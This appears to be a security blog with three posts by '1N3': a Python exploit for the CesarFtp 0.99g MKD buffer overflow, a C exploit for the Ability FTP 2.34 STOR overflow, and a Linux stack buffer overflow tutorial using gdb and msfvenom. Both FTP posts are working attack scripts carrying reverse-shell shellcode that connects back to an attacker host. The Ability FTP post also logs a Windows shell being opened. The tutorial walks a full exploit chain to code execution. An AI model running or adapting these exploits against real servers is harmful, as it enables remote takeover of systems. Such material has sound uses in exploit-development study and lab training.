
Saturday, April 26, 2014

CesarFtp 0.99g Buffer Overflow Exploit

#!/usr/bin/python
#CesarFtp 0.99g Buffer Overflow Exploit by 1N3 @ treadstonesecurity.blogspot.ca
#Uses Metasploit's exploit/multi/handler reverse meterpreter shellcode to gain remote access to the target. Replace as needed.

from socket import *

shellcode = ( # reverse meterpreter shell 4444
    # Payload bytes for the Metasploit handler named in the file header
    # (8 lines x 15 bytes = 120 bytes). These are Python 2 str literals, so
    # each "\x.." escape is one byte and the value concatenates with the other
    # str pieces of the request in the script below. Treated as opaque data
    # here: nothing on this page decodes it.
"\xbb\x9c\x7e\x21\x9b\xdb\xca\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x18\x31\x5a\x13\x83\xc2\x04\x03\x5a\x93\x9c\xd4\x67\x9a\xbb"
"\x73\x13\x9f\x0b\xf7\x63\x13\xe7\x57\x78\xa0\xe5\xdc\xf2\x96"
"\xa4\x4e\xbc\xd5\xb0\xad\x73\xea\xe3\xff\x06\xe3\x97\x6a\xe1"
"\x70\xe2\x56\x7a\xca\xe8\xde\xf7\x9e\xff\x02\x09\xf7\x8b\x7a"
"\x51\x06\x64\xf7\x10\x34\x75\xe6\xd0\x2d\x79\xa5\xbc\xac\xeb"
"\x4b\xbe\x7e\x7c\x23\x80\xd6\x94\xbe\x68\x24\x9b\xaf\x34\xa1"
"\x7a\x9c\x73\xbd\x2f\x72\x2b\xec\xa5\x64\x82\x59\x6c\x7a\xc1")

def intel_order(i):
    """Pack the low 32 bits of *i* as a 4-character little-endian string.

    The least significant byte comes first. Each byte is emitted with
    ``chr()`` so the result concatenates with the other ``str`` pieces of
    the request buffer; any bits above the low 32 are discarded.
    """
    little_endian = []
    for _ in range(4):
        little_endian.append(chr(i & 0xff))  # lowest remaining byte first
        i >>= 8
    return "".join(little_endian)

host = "192.168.23.112"  # FTP server address used by the author's lab run
port = 21
user = "ftp"  # credentials sent with USER/PASS before the MKD below
password = "ftp"
# Value the script writes over EIP; intel_order() turns it into 4
# little-endian bytes. The commented-out alternative is the author's
# user32.dll "jmp esp" for XP SP1 English; where 0x76AA679b comes from is not
# stated beyond "metasploit module".
#EIP = 0x77D718FC #jmp esp <user32.dll XP SP1 english>
EIP = 0x76AA679b #jmp esp <metasploit module>

# Python 2 socket session (print statements, str buffers): connect, read the
# banner, then authenticate. Replies are printed but never checked, so a
# rejected login is only visible in the output.
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

# One overlong MKD argument, laid out by the author as:
#   671 x "\n" + "AAA"   -> 674 bytes of filler
#   intel_order(EIP)     -> the 4 bytes placed over EIP
#   40 x "\x90"          -> NOP sled
#   shellcode            -> the 120-byte payload defined above
#   "\r\n"               -> FTP line terminator
# Where inside the server's MKD handling the copy overflows is not shown on
# this page; only these offsets are. For detection purposes the observable
# artefact is a single MKD line of roughly 840 bytes consisting of newlines,
# 0x90 and other non-printable bytes.
buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + shellcode
buffer += "\r\n"

print "len: %d" % (len(buffer))  # total request length, for the record

s.send(buffer)
print s.recv(1024)  # whatever the server replies; may be empty if it crashed

s.close()

Wednesday, January 1, 2014

Ability FTP Server 2.34 STOR Buffer Overflow Exploit



/*
Ability FTP 2.34 STOR Buffer Overflow Exploit by 1N3
Reverse shell payload 192.168.16.151 port 443
http://treadstonesecurity.blogspot.com

NOTE: Replace shellcode and return address for other IP's/OS platforms...

msf exploit(handler) > run

[*] Started reverse handler on 192.168.16.151:443
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.17.17
[*] Command shell session 4 opened (192.168.16.151:443 -> 192.168.17.17:1087) at 2014-01-01 12:02:29 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\abilitywebserver>
*/

#include <string.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>

// JMP ESP USER32.DLL WinXPSP2 ENG
// 77D8AF0A OR \x0a\xaf\xd8\x77

// Pieces of the STOR argument assembled in login(). All three are
// NUL-terminated char arrays, so sizeof() is one more than the byte count;
// login() appends them with memcpy(…, sizeof(x)) at strlen(buffer), which
// copies each terminating NUL and then overwrites it on the next append.
char returnaddr[]="\x0a\xaf\xd8\x77"; // 77D8AF0A little-endian (see comment above)
char noop_sled[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // NOP sled (0x90 bytes)
// Reverse-shell payload (connect-back to 192.168.16.151:443 per the header
// comment). Treated as opaque bytes here; nothing on this page decodes it.
char shellcode[]="\xdb\xdd\xd9\x74\x24\xf4\x58\xba\x45\x17\xd4\x0c\x2b\xc9\xb1\x49\x31\x50\x19\x03\x50\x19\x83\xc0\x04\xa7\xe2\x28\xe4\xae\x0d\xd1\xf5\xd0\x84\x34\xc4\xc2\xf3\x3d\x75\xd2\x70\x13\x76\x99\xd5\x80\x0d\xef\xf1\xa7\xa6\x45\x24\x89\x37\x68\xe8\x45\xfb\xeb\x94\x97\x28\xcb\xa5\x57\x3d\x0a\xe1\x8a\xce\x5e\xba\xc1\x7d\x4e\xcf\x94\xbd\x6f\x1f\x93\xfe\x17\x1a\x64\x8a\xad\x25\xb5\x23\xba\x6e\x2d\x4f\xe4\x4e\x4c\x9c\xf7\xb3\x07\xa9\xc3\x40\x96\x7b\x1a\xa8\xa8\x43\xf0\x97\x04\x4e\x09\xdf\xa3\xb1\x7c\x2b\xd0\x4c\x86\xe8\xaa\x8a\x03\xed\x0d\x58\xb3\xd5\xac\x8d\x25\x9d\xa3\x7a\x22\xf9\xa7\x7d\xe7\x71\xd3\xf6\x06\x56\x55\x4c\x2c\x72\x3d\x16\x4d\x23\x9b\xf9\x72\x33\x43\xa5\xd6\x3f\x66\xb2\x60\x62\xef\x77\x5e\x9d\xef\x1f\xe9\xee\xdd\x80\x41\x79\x6e\x48\x4f\x7e\x91\x63\x37\x10\x6c\x8c\x47\x38\xab\xd8\x17\x52\x1a\x61\xfc\xa2\xa3\xb4\x52\xf3\x0b\x67\x12\xa3\xeb\xd7\xfa\xa9\xe3\x08\x1a\xd2\x29\x21\xb0\x28\xba\x8e\xec\x23\xad\x67\xee\x43\xd0\xcc\x67\xa5\xb8\x22\x21\x7d\x55\xda\x68\xf5\xc4\x23\xa7\x73\xc6\xa8\x4b\x83\x89\x58\x26\x97\x7e\xa9\x7d\xc5\x29\xb6\xa8\x60\xd6\x22\x56\x23\x81\xda\x54\x12\xe5\x44\xa7\x71\x7d\x4c\x3d\x3a\xea\xb1\xd1\xba\xea\xe7\xbb\xba\x82\x5f\x9f\xe8\xb7\x9f\x0a\x9d\x6b\x0a\xb4\xf4\xd8\x9d\xdc\xfa\x07\xe9\x43\x04\x62\xeb\xb8\xd3\x4b\x69\xc8\x51\xb8\xb1";

// CONNECT TO FTP SERVER
// Resolves `host`, opens a TCP socket and connects it to host:port.
// Returns the connected socket descriptor. On any failure (name lookup,
// socket() or connect()) a diagnostic is printed and the process exits with
// status 0, so the caller never sees an invalid socket. WSAStartup() is
// called here and is never paired with WSACleanup().
int conn(char *host, u_short port)
{
    WSADATA wsa;
    struct sockaddr_in target;
    struct hostent *resolved;
    int fd;

    WSAStartup(MAKEWORD(2,0), &wsa);

    resolved = gethostbyname(host);
    if (!resolved) {
        printf("x--==[ gethostbyname() error!\n");
        exit(0);
    }

    // Fill the address from the first entry of h_addr_list.
    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(port);
    target.sin_addr = **((struct in_addr **) resolved->h_addr_list);

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) {
        printf("x--==[ Socket\n");
        exit(0);
    }

    if (connect(fd, (struct sockaddr *) &target, sizeof(target)) < 0) {
        printf("x--==[ Connect() error!\n");
        exit(0);
    }

    printf("x--=[ Connected to %s\n", host);
    return fd;
}

// LOGIN AND SEND BUFFER TO FTP SERVER
// Authenticates on `sock` with USER/PASS, then sends one STOR command whose
// argument is the oversized buffer built from the globals above
// (965 x 0x41, returnaddr, noop_sled, shellcode). Only the PASS reply is
// inspected; every failure path calls exit(0). The parameter `login`
// shadows the function's own name inside the body (legal C, but confusing).
void login(int sock, char *login, char *pass)
{

char ubuf[1000], pbuf[1000], rc[200];
int i; // unused
char buffer[2000], final_buffer[2000];
      memset(buffer, 0x00, 2000); // CLEAR OUT BUFFER
      memset(buffer, 0x41, 965); // ADD 0x41 (A's) * 965 TO FILL UP INITIAL BUFFER
      // Each memcpy copies sizeof(array) bytes, i.e. including the array's
      // terminating NUL; the next append starts at strlen(buffer), which is
      // exactly that NUL, so it gets overwritten. The shellcode's NUL stays
      // and terminates the string for sprintf() below.
      memcpy(buffer+strlen(buffer), &returnaddr, sizeof(returnaddr)); // RETURN ADDRESS
      memcpy(buffer+strlen(buffer), &noop_sled, sizeof(noop_sled)); // COPY NOOP SLED
      memcpy(buffer+strlen(buffer), &shellcode, sizeof(shellcode)); // COPY SHELLCODE TO BUFFER

      // The whole overflow travels as the argument of a single STOR line
      // (over 1 KB, mostly 0x41); that line is the detectable artefact.
      sprintf(final_buffer, "STOR %s\r\n", buffer); // COPY STOR COMMAND TO BUFFER
      // puts(final_buffer);

      // ubuf/pbuf hold 1000 bytes, so credentials under 100 chars fit.
      if ( strlen(pass) >= 100 )  { printf("2 long password!\n"); exit(0); }
      if ( strlen(login) >= 100 ) { printf("2 long login!\n"); exit(0);    }

      // Fixed 2 s pauses between commands; the USER reply is never read.
      Sleep(2000);
      printf("x--=[ Sending USER...");
      sprintf(ubuf, "USER %s\r\n", login);
      send(sock, ubuf, strlen(ubuf), 0);
      printf("OK!\n");

      Sleep(2000);
      printf("x--=[ Sending PASS...");
      sprintf(pbuf, "PASS %s\r\n", pass);
      send(sock, pbuf, strlen(pbuf), 0);
      // NOTE(review): recv()'s return value is ignored and rc is never
      // NUL-terminated, so strstr() may scan beyond the received bytes.
      recv(sock, rc, 200, 0);
      if ( strstr(rc, "530")) {printf("Bad password!\n"); exit(0); }
      printf("OK!\n");

      Sleep(2000);
      printf("x--=[ Sending exploit...");
      send(sock, final_buffer, strlen(final_buffer), 0); // FINAL BUFFER TO SEND
      Sleep(2000);
      printf("OK!\n");
      printf("x--=[ Wait for reverse shell port 443 TCP...\n");

      Sleep(4000);
      printf("x--=[ Done!\n\n");

}

// Entry point: expects <host> <username> <password> in argv, connects to
// TCP port 21 on <host> (the port is hard-coded), runs login(), then closes
// the socket and pauses 2 s before returning. A usage error calls exit(0),
// so the exit code does not distinguish failure from success.
int main(int argc, char **argv)
{
    int sock = 0;
    int data; // unused
    printf("\n--==[ Ability FTP Server <= 2.34 Exploit ]==--\n");
    printf("--==[ by Treadstone Security Group - 1N3 ]==--\n--==[ http://treadstonesecurity.blogspot.com ]==--\n");

    if ( argc < 4 ) { printf("--==[ Usage: ability_ftp_server_exploit.exe <host> <username> <password>\n\n"); exit(0); }

    sock = conn(argv[1], 21);
    login(sock, argv[2], argv[3]);
    closesocket(sock);
    Sleep(2000);

    return 0;
}

Friday, November 29, 2013

Linux Buffer Overflow Tutorial

LINUX BUFFER OVERFLOW TUTORIAL BY 1N3

                          

      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          

# OVERVIEW
This tutorial covers the basics of exploiting buffer overflows on Linux x86 platforms. Tested on BackTrack 5R3 Linux 3.2.6 i686 GNU/Linux.




# CREATE A VULNERABLE C APP THAT ACCEPTS USER INPUT WITH A TOTAL BUFFER OF 100 BYTES BUT NO BOUNDS CHECKING...

########################## test.c
#include <unistd.h>

// Deliberately vulnerable demo: copies argv[1] into a fixed 100-byte stack
// buffer with strcpy(), which performs no length check, so an argument
// longer than the buffer overwrites whatever the compiler placed above it
// (the session below shows saved EBP and the return address being clobbered).
// The fix in real code is an explicit length check plus a bounded copy, e.g.
// rejecting inputs with strlen(argv[1]) >= sizeof buff, or
// snprintf(buff, sizeof buff, "%s", argv[1]). Note that printf(), exit()
// and strcpy() are used without <stdio.h>, <stdlib.h> or <string.h> — only
// <unistd.h> is included above — so modern compilers warn about implicit
// declarations.
int main(int argc, char *argv[])
{
    char buff[100];
    if(argc <2)
    {
        printf("Syntax: %s <input string>\n", argv[0]);
        exit (0);
    }
    strcpy(buff, argv[1]); // unbounded copy: the overflow under study
    return 1;
}

# COMPILING 
gcc test.c -fno-stack-protector -z execstack -o test.o

# DISABLE MEMORY RANDOMIZATION
echo 0 > /proc/sys/kernel/randomize_va_space

# DEBUG THE APPLICATION
gdb test.o

(gdb) disass main
Dump of assembler code for function main:
   0x08048454 <+0>:    push   %ebp
   0x08048455 <+1>:    mov    %esp,%ebp
   0x08048457 <+3>:    and    $0xfffffff0,%esp
   0x0804845a <+6>:    add    $0xffffff80,%esp
   0x0804845d <+9>:    cmpl   $0x1,0x8(%ebp)
   0x08048461 <+13>:    jg     0x8048484 <main+48>
   0x08048463 <+15>:    mov    0xc(%ebp),%eax
   0x08048466 <+18>:    mov    (%eax),%eax
   0x08048468 <+20>:    mov    %eax,0x4(%esp)
   0x0804846c <+24>:    movl   $0x8048570,(%esp)
   0x08048473 <+31>:    call   0x8048374 <printf@plt>
   0x08048478 <+36>:    movl   $0x0,(%esp)
   0x0804847f <+43>:    call   0x8048384 <exit@plt>
   0x08048484 <+48>:    mov    0xc(%ebp),%eax
   0x08048487 <+51>:    add    $0x4,%eax
   0x0804848a <+54>:    mov    (%eax),%eax
   0x0804848c <+56>:    mov    %eax,0x4(%esp)
   0x08048490 <+60>:    lea    0x1c(%esp),%eax
   0x08048494 <+64>:    mov    %eax,(%esp)
   0x08048497 <+67>:    call   0x8048364 <strcpy@plt>
   0x0804849c <+72>:    mov    $0x1,%eax
   0x080484a1 <+77>:    leave
   0x080484a2 <+78>:    ret   
End of assembler dump.

# SET BREAKPOINTS
(gdb) break *0x08048497
Breakpoint 1 at 0x8048497
(gdb) break *0x0804849c
Breakpoint 2 at 0x804849c
(gdb) break *0x080484a1
Breakpoint 3 at 0x80484a1

# FUZZ THE APPLICATION, OVERWRITE THE BUFFER AND CHECK IF ANY REGISTERS ARE OVERWRITTEN...
(gdb) r "`perl -e 'print "A"x120'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "A"x120'`"
Breakpoint 1, 0x08048497 in main ()

# REGISTERS BEFORE USER INPUT
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x85b7641f    -2051578849
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Breakpoint 2, 0x0804849c in main ()
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x804849c    0x804849c <main+72>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

# CHECK EAX REGISTER FOR A's (0x41)...
(gdb) x/16xb $eax
0xbffff72c:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff734:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41

Breakpoint 3, 0x080484a1 in main ()
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x80484a1    0x80484a1 <main+77>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

(gdb) step
Single stepping until exit from function main,
which has no line number information.
Warning:
Cannot insert breakpoint 0.
Error accessing memory address 0x41414141: Input/output error.

0x41414141 in ?? ()
(gdb)

# EBP AND EIP ARE OVERWRITTEN WITH A'S (0x41414141)
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff7a0    0xbffff7a0
ebp            0x41414141    0x41414141
esi            0x0    0
edi            0x0    0
eip            0x41414141    0x41414141
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)


# Find which bytes of the input land in EIP and EBP. Then restore EBP to its value from before the overflow, and point EIP at the start of the buffer (the address held in EAX)...

# Value to place in EIP (the buffer address seen in EAX before the overflow)
EIP 0xbffff72c

# EBP prior to user input
EBP  0xbffff798


# CREATE UNIQUE PATTERN TO FIND EIP/EBP OVERWRITE...
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 120
[*] exec: ruby pattern_create.rb 120
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9



# FUZZ TEST.C WITH UNIQUE PATTERN TO FIND REGISTER OFFSET VALUES
(gdb) r "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Breakpoint 1, 0x08048497 in main ()

(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x72698d95    1919520149
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

Program received signal SIGSEGV, Segmentation fault.
0x64413764 in ?? ()
(gdb)


# FIND EIP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 64413764
[*] exec: ruby pattern_offset.rb 64413764
[*] Exact match at offset 112


# FIND EBP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 41366441
[*] exec: ruby pattern_offset.rb 41366441
[*] Exact match at offset 108


# CREATE SHELLCODE USING METASPLOIT TO RUN THE LINUX COMMAND 'whoami'...
msf exploit(ms06_040_netapi) > msfvenom -p linux/x86/exec CMD=whoami -b "x00" -e x86/shikata_ga_nai

[*] x86/shikata_ga_nai succeeded with size 69 (iteration=1)
buf =
"\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9" +
"\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28" +
"\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad" +
"\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51" +
"\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36"

# EIP LITTLE ENDIAN
EIP 0xbffff72c
\x2c\xf7\xff\xbf

# EBP LITTLE ENDIAN
EBP  0xbffff798
\x98\xf7\xff\xbf


# CONSTRUCT BUFFER/EXPLOIT
total buff = 116
EIP = 4
EBP = 4
shellcode = 69
noops = 39


buffer = noops + shellcode + noops + ebp + eip
/================================================\
||116 *** 19 ****** 69 ******* 20 ***** 4 **** 4||
\================================================/

# RUN EXPLOIT...
(gdb) r "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
process 16807 is executing new program: /bin/bash
process 16807 is executing new program: /usr/bin/whoami
root

Program exited normally.
(gdb)